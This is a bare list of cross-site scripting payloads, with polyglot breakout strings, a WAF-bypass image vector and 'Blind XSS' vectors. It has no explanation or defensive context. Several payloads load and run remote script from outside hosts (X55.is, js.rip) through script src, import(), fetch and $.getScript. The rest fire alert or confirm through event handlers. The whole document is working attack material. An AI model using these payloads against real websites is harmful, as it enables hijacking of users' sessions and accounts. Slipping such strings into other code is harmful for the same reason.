xss

JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

1</Script/><Svg/OnLoad=(confirm)(1)>
1"<!--><Svg OnLoad=(confirm)(1)<!--
1</Script/><Svg/OnLoad%0A=(confirm)(1)>
"'-->confirm`xss`<%2FScript><Script%2F1%3D'
'"--></style></scRipt><scRipt>alert(1)</scRipt>

WAF BYPASS

<Img Src=OnXSS OnError=alert(1)>


Blind XSS

Blind XSS Custom Vector - Default
Simple, good for known PoCs.

<Script /Src=https://X55.is?1=1290></Script>

Blind XSS Custom Vector - Short Polyglot (HTML & JS Main Cases)
Balanced, good size and power.

'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=1290/.source))//>

Blind XSS Custom Vector - Full Polyglot (20+ XSS Cases)
Best, for non-restricted inputs.

JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is?1=1290/.source))}//\76-->

JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->"><img src=x onerror='fetch("https://js.rip/t9eoip8zws)'><script>$.getScript("//js.rip/t9eoip8zws")</script><script src="//js.rip/t9eoip8zws"></script>